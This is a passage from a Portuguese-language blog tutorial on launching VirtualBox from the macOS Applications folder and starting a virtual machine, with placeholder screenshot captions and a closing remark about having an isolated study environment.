Vá até o Menu Ir(Go)-> Aplicativos(Aplications)

Tela_9

Tela_9

Dentro da pasta Alicativos (Aolications) procure pelo Nome/Icone VIrtualBox

Tela_10

Tela_10

Após aberto o Virtual BOX voltará a seguinte interface

Iniciar_VM

Iniciar_VM

Do lado esquerdo marque a VM (Virtual Machine – Máquina Vrtual) que quer iniciar e clique em Iniciar no painel superior do programa

Iniciar_VMm

Iniciar_VMm

Vejamos agora o resultado de todo nosso esforço

VM_pronta1

VM_pronta1

VM_pronta2

VM_pronta2

VM_pronta3

VM_pronta3

É isso ai galera, agora vocês têm um ambiente de teste e estudos Pronto e totalmente isolado do Sistema Operacional, onde não haverá problemas em executar qualquer comando ou rotina arriscada, qualquer coisa que aconteça na VM (Virtual Machine – Máquina Vitual) não afetará o Sistema Operacional. Obrigado a todos pela visita. 😀